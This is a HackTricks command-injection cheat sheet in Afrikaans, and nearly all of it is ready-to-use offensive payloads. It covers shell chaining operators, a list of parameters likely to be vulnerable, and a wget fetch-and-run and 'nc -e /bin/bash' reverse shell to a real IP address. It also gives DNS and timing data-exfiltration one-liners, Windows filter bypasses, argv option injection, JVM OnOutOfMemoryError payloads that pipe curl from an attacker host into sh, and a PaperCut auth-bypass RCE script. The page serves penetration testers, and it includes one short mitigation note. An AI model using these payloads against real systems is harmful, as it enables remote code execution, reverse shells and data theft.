Command Injection

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Wat is command Injection?

A command injection maak dit moontlik vir ’n aanvaller om arbitrêre bedryfstelselopdragte op die bediener wat ’n toepassing huisves, uit te voer. Gevolglik kan die toepassing en al sy data volledig gekompromitteer word. Die uitvoering van hierdie opdragte laat die aanvaller gewoonlik toe om ongemagtigde toegang tot of beheer oor die toepassing se omgewing en die onderliggende stelsel te verkry.

Konteks

Afhangend van waar jou insette ingespuit word, mag dit nodig wees om die aangehaalde konteks te beëindig (met " of ') voordat die opdragte.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Beperkings Bypasses

As jy probeer om lukrake opdragte binne ’n linux machine uit te voer, sal jy belangstel om te lees oor hierdie Bypasses:

Bypass Linux Restrictions

Voorbeelde

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Hier is die top 25 parameters wat vatbaar kan wees vir code injection en soortgelyke RCE-kwetsbaarhede (van link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Tydgebaseerde data exfiltration

Onttrekking van data: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Gebaseer op die tool van https://github.com/HoLyVieR/dnsbin, wat ook gehost word by dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Aanlyn gereedskap om DNS-gebaseerde data-ekfiltrasie te kontroleer:

• dnsbin.zhack.ca
• pingb.in

Filter-omseiling

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Wanneer jy JavaScript/TypeScript back-ends oudit, sal jy dikwels die Node.js child_process API teëkom.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() skep ’n shell (/bin/sh -c), daarom sal enige karakter wat ’n spesiale betekenis vir die shell het (back-ticks, ;, &&, |, $(), …) lei tot command injection wanneer gebruikersinvoer in die string gekonkateneer word.

Mitigation: gebruik execFile() (of spawn() sonder die shell opsie) en voorsien elke argument as ’n aparte array-element sodat geen shell betrokke is nie:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Werklike geval: Synology Photos ≤ 1.7.0-0794 was eksploiteerbaar deur ’n nie-geauthentiseerde WebSocket-gebeurtenis wat deur die aanvaller beheerde data in id_user geplaas het, wat later in ’n exec()-aanroep ingesluit is, wat RCE teweeggebring het (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Nie alle injections vereis shell metacharacters nie. As die toepassing ongeverifieerde strings as argumente aan ’n stelselprogram deurgee (selfs met execve/execFile en geen shell), sal baie programme steeds enige argument wat met - of -- begin as ’n option parseer. Dit laat ’n aanvaller toe om modi om te skakel, uitvoerpaaie te verander, of gevaarlike gedrag te veroorsaak sonder om ooit in ’n shell in te breek.

Tipiese plekke waar dit voorkom:

• Ingebedde web UIs/CGI-handlers wat opdragte bou soos ping <user>, tcpdump -i <iface> -w <file>, curl <url>, ens.
• Gesentraliseerde CGI-routers (bv. /cgi-bin/<something>.cgi met ’n selector-parameter soos topicurl=<handler>) waar verskeie handlers dieselfde swakke valideerder hergebruik.

Wat om te probeer:

• Verskaf waardes wat met -/-- begin om deur die onderliggende hulpmiddel as vlae gebruik te word.
• Misbruik vlae wat gedrag verander of lêers skryf, byvoorbeeld:
  • ping: -f/-c 100000 om die toestel te oorlaai (DoS)
  • curl: -o /tmp/x om arbitrêre paaie te skryf, -K <url> om deur die aanvaller beheerde config te laai
  • tcpdump: -G 1 -W 1 -z /path/script.sh om post-rotate uitvoering in onveilige wrappers te bewerkstellig
• As die program -- end-of-options ondersteun, probeer om naïewe mitigasies te omseil wat -- op die verkeerde plek voorafvoeg.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM diagnostiese callbacks vir gewaarborgde exec

Enige primitive wat jou toelaat om JVM command-line arguments te injekteer (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) kan omgeskakel word in ’n betroubare RCE sonder om application bytecode aan te raak:

1. Forceer ’n deterministiese crash deur metaspace of heap te verklein: -XX:MaxMetaspaceSize=16m (or a tiny -Xmx). Dit verseker ’n OutOfMemoryError selfs tydens vroeë bootstrap.
2. Koppel ’n fout-hook: -XX:OnOutOfMemoryError="<cmd>" of -XX:OnError="<cmd>" voer ’n arbitrêre OS-opdrag uit wanneer die JVM aborteer.
3. Voeg opsioneel -XX:+CrashOnOutOfMemoryError by om herstelpogings te vermy en die payload eenmalig te hou.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Omdat hierdie diagnostika deur die JVM self ontleed word, is geen shell-metakarakters nodig nie en voer die kommando uit met dieselfde integriteitsvlak as die launcher. Desktop IPC-foute wat deur gebruiker-verskafte JVM-vlagte (sien Localhost WebSocket abuse) deurgee, vertaal dus direk na OS-kommando-uitvoering.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

• Kwesbare NG/MF-builds (bv. 22.0.5 Build 63914) gee toegang tot /app?service=page/SetupCompleted; deur daar te blaai en op Login te klik, word ’n geldige JSESSIONID teruggegee sonder credentials (authentication bypass in the setup flow).
• In Options → Config Editor, stel print-and-device.script.enabled=Y en print.script.sandboxed=N om printer-scripting aan te skakel en die sandbox uit te skakel.
• In die printer Scripting tab, skakel die script aan en hou printJobHook gedefinieer om valideringsfoute te voorkom, maar plaas die payload outside die funksie sodat dit onmiddellik uitgevoer word wanneer jy op Apply klik (geen print job nodig):

function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);

• Ruil die callback vir ’n reverse shell; as die UI/PoC nie pipes/redirects kan hanteer nie, stage ’n payload met een opdrag en exec dit met ’n tweede versoek.
• Horizon3’s CVE-2023-27350.py automatiseer die auth bypass, config flips, command execution en rollback — voer dit deur ’n upstream proxy (bv., proxychains → Squid) wanneer die diens slegs intern bereikbaar is.

Brute-Force Opsporingslys

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Verwysings

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://portswigger.net/web-security/os-command-injection
• Extraction of Synology encrypted archives – Synacktiv 2025
• PHP proc_open manual
• HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
• Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered
• When WebSockets Lead to RCE in CurseForge
• PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE
• CVE-2023-27350.py (auth bypass + print scripting automation)

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.